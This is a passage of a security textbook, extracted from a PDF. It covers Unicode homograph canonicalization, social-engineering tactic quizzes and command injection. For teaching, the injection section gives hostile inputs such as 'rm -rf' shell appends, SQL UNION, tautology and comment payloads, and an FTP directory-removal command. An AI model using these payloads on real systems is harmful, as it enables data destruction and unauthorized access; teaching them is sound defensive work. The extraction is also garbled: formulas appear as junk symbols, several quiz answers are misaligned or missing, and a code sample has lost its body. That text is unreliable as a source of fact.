search term and the searched text. Then the canonicalized terms can be equated
using a simple string comparison.
There are several components to the canonicalization process: homograph sets,
a canon, and the canonicalization function.
84 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Homograph Set
݄ Earlier it was mentioned that the Latin letter A appears identical to the Greek 'A'
even though the encodings are different (0x0041 vs. 0x0391). These letters are
Homograph Set homographs. Consider a set of such homographs representing all the ways we
A set of can encode the letter 'A' in plaintext. We call this a homograph set and represent
unique encodings it with lowercase .
perceived by the
We can define a homograph set formally with:
observer as being
the same. ୧ ǡ ୨ ୧ ר א୨ א՞ ሺଵ ǡ ଶ ሻ
Figure 04.4: Homograph set definition
In other words two encodings are members of the same homograph set if the
observer considers them to be homographs. For a given homograph scenario,
there will be many homograph sets.
Canon
ܿ For a given homograph scenario, there are many homograph sets. We will give
each homograph set a unique name or symbol. This name is called a canon. The
Canon term “canon” means a general rule, fundamental principle, aphorism, or axiom
A unique governing the systematic or scientific treatment of a subject. For example, the set
representation of books constituting the Bible are called the “canon.”
of a homograph set.
The canonical form is “in its simplest or standard form.” For example, the
fractions ͳൗʹ, ʹൗͶ, and ͵ൗ are all equivalent. However, the standard way to write
one half is ͳൗʹ. This is the canonical form of the fraction. In the context of
homographs, a canon (or canonical token) is defined as a unique representation
of a homograph set. Note that the format of the canonical token c may or may
not be the same format as the encoding ݁ or the rendition format ݎ.
Canonicalization Function
The canonicalization function is a function that returns a canon from a given
ܥሺ݁ሻ
encoding:
Canonicalization ሺሻ ՜
Function Figure 04.5: Canonicalization function definition
The process of
Recall our case-insensitive search problem mentioned earlier. In this case,
returning the canon
uppercase and lowercase versions of the same letter are considered homographs.
for a given encoding.
Thus the homograph sets would be {a, A}, {b, B}, {c, C}, …. We will identify
a canon as the lowercase version of each of the letters. Thus the canonicalization
function would be tolower().
All canonicalization functions must adhere to two properties: the unique canons
property and the reliable canons property. The unique canons property states
that any pair of non-homograph encodings will yield different canonical tokens:
ଵ ǡ ଶ ሺଵ ሻ ് ሺଶ ሻ ՞ ሺଵ ǡ ଶ ሻ ൏
Figure 04.6: The unique canons property
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 85
The reliable canons property states that the canonicalization function will always
yield identical canonical tokens for any homograph pair:
ଵ ǡ ଶ ሺଵ ሻ ൌ ሺଶ ሻ ՞ ሺଵ ǡ ଶ ሻ
Figure 04.7: Reliable canons property
Any canonicalization function that honors these two properties will be sufficient
to detect homographs.
86 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
(EMD) algorithm traditionally used to compare images. When glyphs are
rendered into pixels, the EMD value can be computed directly. The end result is
a “SIM-LIST,” a list of the degree of similarity between UNICODE glyphs using the
Arial font. An example of a SIM-LIST entry for the letter ‘i’ is the following:
0069 1:2170:?
1:FF49:i
1:0069:i
1:0456:?
0.980198:00A1:\241
0.952381:1F77:?
From this table we will notice that there are 6 elements in the homograph set:
0x2170, 0xFF49, 0x0069, 0x0456, 0x00A1, and 0x1F77. Of these, the first four are
“perfect” homographs. This means there are no differences in the glyphs for
0x2170, 0xFF49, 0x0069, 0x0456, and 0x00A1. The next one is a 98.01%
homograph. The final one is a 95.23% homograph. The rendition of these are the
following in Arial:
L L L L c గ
0x2170 0xFF49 0x0069 0x0456 0x00A1 0x1F77
Figure 04.8: Example of near homographs for the letter i
The canonicalization function will then look up a given glyph in the SIM-LIST and
return the lowest value. With this function, it becomes possible to find all names
that are visually similar to “Maze Solver.”
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 87
Examples
1. Q A man walking into a secure building behind an unknown woman where there
are two doors: one that has no security mechanisms and the second containing
a lock requiring a key-card for entrance. It is against policy for an employee to
allow someone to “tailgate” through the second door without authenticating
with the key-card. The woman opens the first of two doors, putting social
pressure on the man to open the second door in return.
A Reciprocation. This is very subtle. The gift given by the attacker (the woman) is
gratitude. The reciprocated gift of larger value is entrance into the secure
building. To mitigate this attack, the man should explain that it is against policy
to open the door and ensure the woman does not enter without key-card
authentication. If she were a real employee, she would understand.
2. Q A car salesman may casually ask a potential buyer if he likes a car that was
recently driven. The buyer replies “yes” because it is the polite thing to do. The
salesman then subtly reminds the buyer that he likes the car when it comes time
to negotiate the price. Any attempt to down-play the value of the car by the
buyer is thwarted because the buyer did say he liked the car!
A Commitment. The attacker tricked the victim to make a promise (that he likes
the car and thus intends to buy it) and then holds him to it (by subtly reminding
him about liking the car). To mitigate this attack, the victim could either renege
on his previous comment or simply point out that the comment was not a
binding agreement to buy the car.
88 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
4. Q A group of co-workers are walking through a secure facility together and notice
something odd. Company policy states that management should be notified and
a report needs to be made under such circumstances. One member of the group
suggests that this would be difficult, expensive, and pointless. It would be better
to just ignore the odd event. After several rounds of discussion, the group
decides to ignore the event. It turns out that the odd event was an attack on the
organization. When questioned about it later, none of the members of the
group can remember agreeing that it would be a good idea to not report it. Who
made that decision, anyway?
5. Q A tourist walking through the streets of a foreign city is looking for a market. By
chance, a man approaches the tourist and offers to give him directions. Being
extra polite, the man offers to walk with the tourist into the market. Once they
arrive, the man mentions that he owns one of the market shops. The gratitude
of the lost tourist prompts him to browse the merchant’s shop and encourages
him to make a purchase.
A Reciprocation. The man making the “by chance” encounter has done something
very nice for the tourist. In fact, he has done a real service. While a simple “thank
you” was offered, somehow it did not seem to be enough. When the shop owner
showed the tourist his shop, a more satisfying way to express gratitude was
offered. This actually happened to me on a family trip to Mexico. Though we did
not buy anything from this man, we certainly felt the pressure to do so. Later,
as we walked back to the bus stop, we encountered the same man escorting a
different group of lost tourists. He looked at us sheepishly!
6. Q A woman runs to the checkout line of a small business. She is out of breath and
appears frantic. As she digs out her wallet to make a purchase, she hurriedly
explains that she is late for an important event. The lady working as the cashier
tries her best to help the woman meet her deadline, but her credit card simply
will not authenticate. The woman explains that it often does that and can she
please use the old manual method. The cashier reluctantly agrees; the manual
method is only for emergencies after all! Later that day as the cashier runs the
manual credit card transaction through, the bank reports that the card was
stolen!
A Scarcity : Rushing. The woman was able to short-circuit the decision making
process of the cashier so a weaker form of authentication could be used. This
enabled her to pass off a stolen credit card.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 89
7. Q For the following scenario, name the social engineering defensive mechanism: I
tell my children to never reveal their name, address, or any other personal
information to strangers who call on the phone.
8. Q For the following scenario, name the social engineering defensive mechanism:
Your professor is teaching you about CARReL, the six types of social engineering
tactics.
A Training. You are being made aware of the types of attacks. No algorithm
(policy), physical mechanism (physical), or alert mechanism (reaction) is
presented.
9. Q For the following scenario, name the social engineering defensive mechanism:
All of my family’s private information is stored in an encrypted file and only two
members of the family know the password.
A Physical. Not matter how much my children might be convinced that they need
to give the information away, they can't.
10. Q For the following scenario, name the social engineering defensive mechanism:
To harden my clerks against Social Engineering attacks, we practice, practice,
and practice some more.
A Inoculation. The more we practice, the better we can detect problems and learn
how to deal with them.
11. Q For the following scenario, name the social engineering defensive mechanism:
When I go into a store and the salesman starts using pressure tactics, my guard
is raised.
90 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
12. Q Which type of social engineering defense mechanisms will a software engineer
need to employ during the course of his or her career?
13.Q Classify the following type of social engineering attack based on the scenario: I
am going to trick you into believing I am someone you feel obligated to obey.
A Authority. The key difference between Authority and Likening is that the person
who is being impersonated with Authority has rank. The person being
impersonated with Likening does not have rank, but instead looks like someone
who is probably trustworthy.
14.Q Classify the following type of social engineering attack based on the scenario: I
do something nice in a situation where it would be impolite to not give a gift
back in return.
15.Q Classify the following type of social engineering attack based on the scenario: I
fool you into believing something is of limited supply which will compel you to
act.
A Scarcity. A sense of urgency is created by the belief that the item is of limited
supply.
16.Q Classify the following type of social engineering attack based on the scenario: I
break something causing you to call on me to get it fixed. This causes you to
believe that I have rank that I do not.
A Reverse Engineering. This may look like an Authority attack and frankly it is. The
goal here is to make you believe that I am someone with rank when I am not.
However, the manner in which the attack is carried out makes this look like
Reverse Engineering. Because I trick you to come to me, you are more likely to
believe that I have the rank I suggest. This is the heart of Reverse Engineering.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 91
17.Q Classify the following type of social engineering attack based on the scenario: I
get you to make a promise then I hold you to it.
A Commitment. The promise was casually made but, because I hold you to it, you
are faced with two unpleasant alternatives: either break your promise or give
me what I want.
18.Q Classify the following type of social engineering attack based on the scenario: I
pretend I am from your high school class.
A Likening. I pretend I am part of a trusted group, but this group has no authority.
If the group had rank or authority, it would be an Authority attack.
19.Q Classify the following type of social engineering defense: When an attack is
found, I will be more vigilant.
A Reaction. First I need to detect the attack, then I need to change my behavior
to deal with the attack which is in progress.
20.Q Classify the following type of social engineering defense: I will put the sensitive
information behind a password that the target cannot access.
21.Q Classify the following type of social engineering defense: I will ask people to
periodically and unexpectedly try to attack me so I am used to it.
A Inoculation. The belief is that through practice, I will get stronger and learn my
weaknesses.
22.Q Classify the following type of social engineering defense: I will put procedures
in place which, if followed, will protect the assets.
A Policy. Because the procedures are handled by humans rather than machines,
this is Policy.
23.Q Classify the following type of social engineering defense: Your boss will make
sure that everyone is aware of CARReLS.
A There are 2 characters in each homograph set because each set has the
uppercase and lowercase version of the letter. There are 4 characters so the
number is size = nl where n = 2 and l = 4. Thus size = 24 = 16.
92 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
25. Q The letter upper-case 'D' encoded in Unicode where p = 1.0. How many possible
homographs are there?
A Because p = 1.0, we need to find the homograph sets with 100% match in a sim-
list. This means members of the homograph set have pixel-perfect glyphs. The
hex ASCII code for 'D' is 0x44 so, looking up that row in the sim-list, we see:
0044 1:0044:D 1:FF24:D 1:216E:?
The first column corresponds to the hex value, the second is the first member
of the sim-list. In this case, the character 0x0044 which is 'D' has a 1 or 100%
match. The next column corresponds to 0xFF24 which is “Fullwidth Latin Capital
D”. It also matches 0x0044 100% as one would expect in a p = 1.0 sim-list. The
final column corresponds to 0x216E which is “Roman Numeral Five Hundred.”
Thus there are 3 potential homographs.
26. Q The two letters 'Ad' encoded in Unicode where p = 0.9. How many possible
homographs are there?
A Because p = 0.9, we need to look up that row in the sim-list. To find homograph
sets with 90% match, the two relevant rows are:
0041 1:FF21:A 1:0410:? 1:0041:A 1:0391:?
0064 1:0064:d 1:FF44:d 1:217E:?
Thus there are four elements in the 'A' homograph set and three in the 'd' set.
The number of homographs is thus 4 x 3 = 12.
A This is the observer function. Given two renditions (r1 and r2), what is the
probability that the observer will consider them the same? The return value is a
number p where 0.0 ≤ p ≤ 1.0
A This is the unique canons property. Given two encodings (e1 and e2), If the
canons of e1 and e2 are not the same, then the two encodings are not
homographs.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 93
29. Q The letter lower-case 'i' encoded in Unicode where p = 0.9. How many
possible homographs are there?
A Because p = 0.9, we need to look up that row in the sim-list to find homograph
sets with 90% match. This means that there is a 90% probability that the average
individual will consider these glyphs the same. The hex ASCII code for 'i' is 0x69
so, looking up that row in the sim-list, we see:
0069 1:2170:? 1:FF49:i 1:0069:i 1:0456:?
0.980198:00A1:\241 0.952381:1F77:?
Again, the first column corresponds to the hex value that we look up. Each row
after that is the p value, the hex value, and a rendition of the glyph. These,
including the name of the Unicode glyph looked up separately, are:
Unicode p Glyph Description
0x2170 100% ϸ Small Roman Numeral One
0xFF49 100% 㹧 Fullwidth Latin Small Letter i
0x0069 100% i Latin Small Letter i
0x0456 100% і Cyrillic Small Letter Byelorussian-Ukrainian i
0x00A1 98.0% ¡ Inverted Exclamation Mark
0x1F77 95.2% ί Greek Small Letter Iota with Oxia
Thus there are 6 potential homographs.
94 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
30. Q Describe the Rendering function, the Observer function, and a Canonicalization
function for the following scenario: I would like to know if two student essays
are the same. Did they plagiarize?
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 95
31. Q Consider the scenario where a recording studio is trying to protect their
copyright for a collection of songs. To do this, they write a web-crawler that
searches for song files. Each song file is then compared against the songs in the
collection to see if it is a copy. How would one write a canonicalization function
to detect these homographs?
96 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
32. Q Imagine a SPAM filter attempting to remove inappropriate messages. The
author of the SPAM is attempting to evade the filter so humans will read the
message and buy the product. The filter is trying to detect the word “SPAM” and
delete all messages containing it. How would one write a canonicalization
function to detect the homographs of “SPAM?”
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 97
Exercises
1 Based on the following characteristics of a scam, identify the social engineering
tactic employed.
x You are one of just a few people eligible for the offer.
x Insistence on an immediate decision.
x The offer sounds too good to be true.
x You are asked to trust the telemarketer.
x High-pressure sales tactics.
x In the Nigerian Scam, the victim is asked to put forth a small sum of “trust
money” in exchange for a large prize in the end.
x A phishing e-mail has the appearance of a legitimate e-mail from your bank.
x In the Nigerian Scam, the attacker sends a picture of himself in which he is
depicted as being your gender, age, and race.
x In the Nigerian Scam, the attacker offers his SSN, bank account number,
phone number, and more.
x You are told you have won a prize, but you must pay for something before
you can receive it.
x “This house has been on the market for only one day. You will need to make
a full price offer if you want to get it.”
x “Take the car for a test drive. You can even take it home for the weekend if
you like. No obligation...”
x You get an e-mail from your bank informing you that your password has
been compromised and to create a new one.
x Satan tempts Jesus on top of the “exceedingly high mountain” promising
him “all the kingdoms of the world.”
2 What types of malware make the most use of social engineering tactics?
3 What types of malware make the least use of social engineering tactics?
4 Which of the following individuals is most likely to try to social engineer you?
x Teacher
x Salesman
x Politician
x Parent
5 In your own words, explain the five social engineering defense options.
98 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
6 For each of the following scenarios, describe how you would mitigate against
the social engineering attack. Try to employ as many of the above listed defense
mechanisms as possible
x You are negotiating the price of a car with a salesman and he attempts to
close the sale by using scarcity: “If you walk off the lot the deal is off.” What
do you do?
x The bank tells you by phone that your password has been compromised and
you need to create a new one. What do you do?
x You are the manager for the registrar’s office. You are very concerned about
student PII being disclosed through social engineering attacks. What should
you do?
7 From memory, list and define the six types of social engineering attacks.
8 From memory, list and define the five defenses to social engineering attacks.
9 How many potential homographs are there for the following scenarios?
x Case-insensitive filename consisting of 10 characters
x The letter lower-case 'o' encoded in Unicode where p = 1.0
x The letter upper-case 'I' encoded in Unicode where p = 0.90
x The two letters 'ID' encoded in Unicode where p = 1.0
10 Provide 10 homographs for the word “homograph”. For each one, provide both
the encoding and how it will be rendered.
12 Compare and contrast the five methods for defeating homograph attacks:
x punycode
x script coloring
x heuristics
x visual similarity
x canonicalization
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 04: Social Engineering | 99
Problems
1 Report on real-world social engineering attacks that you have witnessed first or
second hand. For each, identify the tactic used by the attacker.
2 What types of social engineering attacks are your children likely to face? How
can you protect them against such attacks?
4 For each of the following scenarios, describe the relevant Rendering function
(rendering engine), Observer function (scrutiny of the observer), and a
Canonicalization function:
x You are writing an e-mail client and wish to thwart phishing attacks against
a list of known e-commerce sites.
x You are working on a family Internet filter and wish to detect incoming
messages containing swear words.
x You are a photographer and have some copyright protected pictures on
publicly facing web pages. You would like to write a web crawler to find if
others have been hosting your pictures illegally.
x You would like to write a pornography filter for a firewall to prevent
inappropriate images from entering the company intranet.
x You are an administrator for a company e-mail server and would like to
prevent new e-mail accounts from being mistaken for existing accounts.
6 Write a program that prompts the user for two filenames. Determine if the two
filenames refer to the same file by writing a filename canonicalization function.
100 | Chapter 04: Social Engineering | Unit 1: Attack Vectors | Security for Software Engineers
Unit 2: Code Hardening
Security for Software Engineers | Unit 2: Code Hardening | Chapter 04: Social Engineering | 101
Chapter 05: Command Injection
One of the main roles of a software engineer in providing security assurances is to identify and fix injection
vulnerabilities. This chapter is to help engineers recognize command injection vulnerabilities and come up
with strategies to prevent them from occurring.
102 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
Perhaps the simplest way to describe command injection is by example. Consider
the following fragment of Perl code:
my $fileName = <STDIN>;
system("cat /home/username/" . $fileName);
This will execute the command “cat” which displays the contents of a file as
provided from STDIN. A non-malicious user will then provide the following input:
grades.txt
Our simple Perl script will then create the following string which will be executed
by the system:
cat /home/username/grades.txt
This appears to be what the programmer intended. On the other hand, what if a
malicious user entered the following?
grades.txt ; rm –rf *.*
The end effect is that two operations will be executed: one to display the contents
of a file and the second to remove all files from the user’s directory. The second
operation is command injection.
On the 15th of July, 2015, the British telecommunications company TalkTalk
experienced a command injection attack on their main webpage. A second attack
occurred on the 2nd of September of the same year. Despite being aware of both
of these attacks and possessing the expertise to close the vulnerability,
management decide to not expedite a fix. On the 15th of October of 2015, a third
attack occurred. This attack resulted in 156,959 customer records being leaked.
Each record contained personal information such as name, birth date, phone and
email addresses. In almost 10% of the records, bank account details were also
leaked. Great Britain’s Information Commissioner found TalkTalk negligent for
“abdicating their security obligations” and for failing to “do more to safeguard its
customer information.” They were fined approximately a half million dollars as a
result.
Mitigation
There are three basic ways to mitigate command injection vulnerabilities:
complete, strong, and weak. Of course complete mitigation is the best, but when
it is not possible, other options exist.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 103
Complete Complete mitigation is to remove any possibility of command injection. This can
be achieved by removing the prerequisite and common denominator to all
command injection vulnerabilities: the command interpreter itself. SQL injection
is not possible when there is no SQL interpreter. FTP injection is not possible if
the system lacks the ability to process FTP commands. Shell injection is not
possible when the system does not contain the functionality to link with the
system’s command interpreter. Programmers use command interpreters
because they are convenient and powerful. In almost every case, another
approach can be found to achieve the same functionality without using a
command interpreter.
Strong When it is not possible to achieve complete mitigation, then the next preferred
option is to use a strong approach. Perhaps this is best explained by example.
Consider the Perl script on the previous page. Instead of allowing the user to
input arbitrary text into the $fileName variable, restrict input to only the
available file names on the system. In other words, create a set of all possible
valid inputs and restrict user input to elements in that set. This technique is called
a “white list” where the list contains elements known to be safe. As long as no
unsafe elements reside on this list and as long as all user input confirms to the
list, then we can be safe.
Weak The final approach is an approach of last resort. When we are unable to perform
complete or strong mitigation, we are forced to look for input known to be
dangerous. Back to the Perl example on the previous page. The key element in
the attack vector is the use of a semicolon to place two commands on one line.
We could prevent the attack by invalidating any user input containing a
semicolon. This technique is called a “black list” where the list contains elements
known to be unsafe. As long as all unsafe elements reside on this list and as long
as no user input conforms to the list, then we can be safe. The difficulty, of course,
is coming up with a complete list of all unsafe constructs!
The four most common types of command injection attacks are SQL or other
database query language, LDAP injection, FTP or other remote file interface
protocols, and batch or other command language interfaces.
SQL Injection
With the development of modern relational databases towards the end of the
1960’s, it became necessary to develop a powerful user interface so database
technicians could retrieve and modify the data stored therein. Command
interfaces were the state of the art at the time so a command interface was
developed as the primary user interface. The most successful such interface is
Structured Query Language (SQL), developed by IBM in the early 1970’s. Though
user interface technology has advanced greatly since the 1970’s, SQL remains the
most common database interface language to this day.
104 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
There are many common uses for databases in the typical e-commerce
application. Examples include finding the existence of a given record (username
paired with a password), retrieving data (generating a list of all the products in a
given category), and adding data (updating a price for an item in the inventory).
In each of these cases, inappropriate uses of the functionality could yield a severe
disruption to the normal operation of the web site. Since SQL clearly has the
descriptive power to allow a user to interface with the database in far more ways
than the policies would allow, it is up to the externally facing interface to convert
the user’s input into a valid and safe query. Vulnerabilities in this process yield
SQL injection attack vectors.
For example, consider a simple web application that prompts the user for a search
term. This term is placed in a variable called %searchQuery%. The user interface
then generates the following SQL statement:
SELECT * FROM dataStore WHERE category LIKE '%searchQuery%';
The details of SQL syntax and how this statement works are not important for this
example. The only thing you need to know is that there exists a table called
dataStore which contains all of the data the user may wish to query. This table
has a column called category containing the key or index to the table. When this
SQL statement is executed, a list of all the rows in dataStore matching
searchQuery will be generated.
To test this code, we will insert the term “rosebud” into %searchQuery%:
rosebud
From this, the following SQL statement will be generated:
SELECT * FROM dataStore WHERE category LIKE 'rosebud';
Enter Henry, a malicious hacker. Henry will attempt to execute an SQL statement
different from what the software engineering intended. He guesses that SQL was
utilized to implement this user interface and also guesses the structure of the
underlying SQL statement. Rather than enter “rosebud” into the user interface,
he will enter the following text:
x'; UPDATE dataStore SET category = 'You have been hacked!
The user interface places this odd-looking string into the variable
%searchQuery%. The end result is the following command sent to the SQL
interpreter:
SELECT * FROM dataStore WHERE category LIKE 'x';
UPDATE dataStore SET category = 'You have been hacked!';
Instead of executing a single, benign query, the interpreter first returns all rows
with categories ending in 'x'. When this is done, it then alters the category of
every row to read “You have been hacked!” In other words, Henry the hacker
successfully modified the table dataStore when the intent was only to be able
to view the table.
For an SQL injection attack to succeed, the attacker needs to know the basic
format of the underlying query as well as have some idea of how the database
tables are organized. There are four main classes of SQL injection attacks: Union
Queries, Tautology, Comments, and Additional Statements.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 105
Union Query Attack
The UNION keyword in SQL allows multiple statements to be joined into a single
result. This allows an SQL statement author to combine queries or to make a
single statement return a richer set of results. If the programmer is using this tool
to more powerfully access the underlying data, then this seems safe. However,
when this tool is harnessed by an attacker, an undesirable outcome may result.
Classification Union
For an SQL Union Queries vulnerability to exist in the code, the following must
be present:
1. There must exist an SQL interpreter on the system.
Vulnerability 2. User input must be used to build an SQL statement.
3. It must be possible for the user to insert a UNION clause into the end of
an SQL statement.
4. The system must pass the SQL statement to the interpreter.
SELECT authenticate
FROM passwordList
WHERE name='$Username' and passwd='$Password';
Example of Here the vulnerable part of the SQL statement is the $Password variable which is
Vulnerable Code accessible from external user input. The intent is to create a query such as:
SELECT authenticate
FROM passwordList
WHERE name='Bob' and passwd='T0P_S3CR3T';
SELECT authenticate
FROM passwordList
WHERE name='Root' and passwd='nothing'
UNION SELECT authenticate
FROM passwordList;
Resulting Query The first query of the statement will likely fail because the password is probably
not “nothing.” However, the second query will succeed because it will return all
values in the passwordList table. For this to work, the attacker needs to be able
to insert the UNION keyword into the statement and generate another table with
the same number of expressions in the target list.
The strong mitigation approach would be to remove SQL from the workflow. If
Mitigation that is not possible, another approach would be to filter input to remove UNION
statements.
106 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
Tautology Attack
Consider an IF statement such as the following:
if (authenticated == true || bogus == bogus)
doSomethingDangerous();
Classification Tautology
For a SQL Tautology vulnerability to exist in the code, the following must be
present:
1. There must exist an SQL interpreter on the system.
2. User input must be used to build an SQL statement.
3. There must be a Boolean expression involved in a security decision.
Vulnerability
4. The expression must contain an OR or it must be possible for the user to
insert an OR into the expression.
5. It must be possible for the user to make the OR clause always evaluate
to true.
6. The system must pass the SQL statement to the interpreter.
SELECT authenticate
Example of FROM passwordList
WHERE name='$Username' and passwd='$Password';
Vulnerable Code
Here the $Password string must be accessible from external user input.
SELECT authenticate
FROM passwordList
WHERE name='Root' and passwd='nothing' OR 'x' = 'x'
FROM passwordList;
Observe how the SQL statement was designed to restrict output to those rows
Resulting Query where the name and passwd fields match. With the tautology, the logical
expression (passwd='nothing' OR 'x' = 'x' ) is always true so the attacker
does not need to know the password. For this attack vector to succeed, the
attacker needs to know the basic format of the query and be able to insert a
quote character.
The strong mitigation approach would be to remove SQL from the workflow. If
Mitigation that is not possible, another approach would be to filter input to remove single
quotes or the OR keyword.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 107
Comment Attack
Comments are a feature of SQL and other programming languages enabling the
programmer to specify text that is ignored by the interpreter. If an external user
is able to insert a comment into part of an SQL statement, then the remainder of
the query will be ignored by the interpreter.
Classification Comments
For an SQL Union Queries vulnerability to exist in the code, the following must
be present:
1. There must exist an SQL interpreter on the system.
2. User input must be used to build an SQL statement.
Vulnerability 3. It must be possible for the user to insert a comment into the end of an
SQL statement.
4. The part of the SQL statement after the comment must be required to
protect some system asset.
5. The system must pass the SQL statement to the interpreter.
SELECT authenticate
FROM passwordList
Example of WHERE name='$Username' and passwd='$Password';
Vulnerable Code
Here the vulnerable part of the SQL statement is the $Username variable which
is accessible from external user input.
SELECT authenticate
FROM passwordList
WHERE name='Root'; -- and passwd='nothing';
Resulting Query
In this example, the second part of the query is commented out, meaning data
will return from the query if any user exists with the name “Root” regardless of
the password. The attacker has, in effect, simplified the query.
The strong mitigation approach would be to remove SQL from the workflow. If
Mitigation that is not possible, another approach would be to filter input to remove
comments.
Note that not all underlying queries can be exploited by the comment attack. If,
for example, passwd='$Password' was the first clause in the Boolean
expression, then it would be much more difficult to exploit.
108 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
Additional Statement Attack
Another class of SQL vulnerabilities stems from some of the power built into the
SQL command suite. Adding an additional statement in an SQL query is as simple
as adding a semi-colon to the input. As with C++ and a variety of other languages,
a semi-colon indicates the end of one statement and the beginning of a second.
By adding a semi-colon, additional statements can be appended onto an SQL
command stream:
For an SQL Additional Statements vulnerability to exist in the code, the following
must be present:
1. There must exist an SQL interpreter on the system.
Vulnerability
2. User input must be used to build an SQL statement.
3. The user input must not filter out a semi-colon.
4. The system must pass the SQL statement to the interpreter.
SELECT authenticate
FROM passwordList
Example of WHERE name='$Username' and passwd='$Password';
Vulnerable Code
Here the vulnerable part of the SQL statement is the $Username variable which
is accessible from external user input.
SELECT authenticate
FROM passwordList
WHERE name='Root' and passwd='nothing';
INSERT INTO passwordList
(name, passwd) VALUES 'Bob', '1234';
Resulting Query
In this example, the attacker is able to execute a second command where the
author intended only a single command to be executed. This command will
create a new entry into the passwordList table, presumably giving the attacker
access to the system.
The strong mitigation approach would be to remove SQL from the workflow. If
Mitigation that is not possible, another approach would be to filter input to remove semi-
colons.
Clearly additional statements are among the most severe of all SQL injection
vulnerabilities. With it, the attacker can retrieve any information contained in the
database, can alter any information, can remove any information, and can even
physically destroy the servers on which the SQL databases reside.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 109
LDAP Injection
The Lightweight Directory Access Protocol (LDAP) is a directory service protocol
allowing clients to connect to, search for, and modify Internet directories
(Donnelly, 2000). Through LDAP, the client may execute a collection of commands
or specify resources through a large and diverse language. A small sampling of
this language is:
ou Organizational unit, such as: ou=University
dc Part of a compound name, such as: dc=www,dc=byui,dc=edu
cn Common name for an item, such as: cn=BYU-Idaho
homedirectory The root directory, such as: homedirectory=/home/cs470
Code vulnerable to LDAP injection attempts may allow access to resources that
are meant to be unavailable.
Classification Disclosure
For an LDAP vulnerability to exist in the code, the following must be present:
1. There must exist an LDAP interpreter on the system.
2. User input must be used to build an LDAP statement.
Vulnerability
3. It must be possible for the user to insert a clause into the end of an LDAP
statement.
4. The system must pass the LDAP statement to the system interpreter.
When the user input is inserted into the ldap string, the following LDAP is
created:
Resulting Code (cn=score.txt, homedirectory=/home/forbidden/)
The best mitigation strategy is to carefully filter input and ensure no LDAP
Mitigation
keywords are used.
110 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
FTP Injection
Before the emergence of web browsers on the Internet, the most common way
to retrieve files was through File Transfer Protocol (FTP) and through the Gopher
system. While the latter has been largely deprecated, FTP is still commonly used
as a command line file transfer mechanism for users and applications. In this
scenario, commands are sent from the client in text format to be interpreted and
executed by the server.
FTP injection may occur when, like SQL injection, an attacker is able to send a
different FTP command than was intended by the programmer. Through an
understanding of how user input is used to create FTP commands, it may be
possible to trick the client into sending arbitrary FTP commands using the client’s
credentials.
For an FTP Additional Statements vulnerability to exist in the code, the following
must be present:
1. There must exist an FTP interpreter on the system.
Vulnerability
2. User input must be used to build an FTP statement.
3. The user input must not filter out a semi-colon.
4. The system must pass the FTP statement to the interpreter.
Example of Here the vulnerable part of the statement is the $filename variable which is
Vulnerable Code accessible from external user input. The intent is to create an FTP statement in
the form of:
RETR <FILENAME>
RETR mydocument.html
RMD .
Resulting Query
This will serve to both retrieve the user’s file as intended, and to also remove the
current working directory (the function of RMD .).
The strong mitigation approach would be to remove FTP from the workflow. If
Mitigation that is not possible, careful filtering of user input is required. This should at a
minimum filter out the newline character.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 111
Shell Injection
Most programming languages provide the programmer with the ability to pass a
command directly to the operating system’s command interpreter. These
commands originate from the program as a textual string and then get
interpreted as a command. The text is then processed as if a user typed the
command directly from the command prompt.
Many programming languages provide the functionality to send commands to the
operating system interpreter. The following is a hopelessly incomplete list
provided as an example:
Java Runtime.getRuntime().exec(command);
C++ system(command);
C# Process.Start(new ProcessStartInfo("CMD.exe", command));
Python subprocess.call(command, shell=True)
PHP exec($command);
Node.js in Javascript child_process.exec(command, function(error, data)
Perl system($command);
Visual Basic .NET MSScriptControl.ScriptControl.Eval(command)
Swift shell(command, []);
Ruby `#{command}`
As with SQL injection, LDAP injection, and FTP injection, shell injection
necessitates user input making it to the interpreter. Providing access to the
underlying command interpreter opens the door to a command injection
vulnerability but it does not guarantee the existence of one. The extra required
step is user input.
112 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
Classification Additional Statements
For shell injection vulnerabilities to exist in the code, the following must be
present:
Vulnerability 1. A mechanism must exist to send text to the operating system command
interpreter.
2. The text must be accessible through user input.
In C++, we can send commands to the command prompt through the system()
command. Consider the following code:
#include <iostring>
#include <unistd.h>
using namespace std;
return 0;
}
An attacker can take advantage of this design by placing two commands on the
Exploitation line where only one was expected. This could be accomplished with the string:
.; rm –R *
ls .; rm -R *
Resulting Query If this code were to be executed, the current directory will be listed then
removed.
Remove the system call from the code and use another way to provide a directory
Mitigation
list.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 113
Examples
1. Q Identify three examples of malicious user input which could exploit the
following:
id = getRequestString("netID");
query = "SELECT * FROM Authentication WHERE netID = " + id
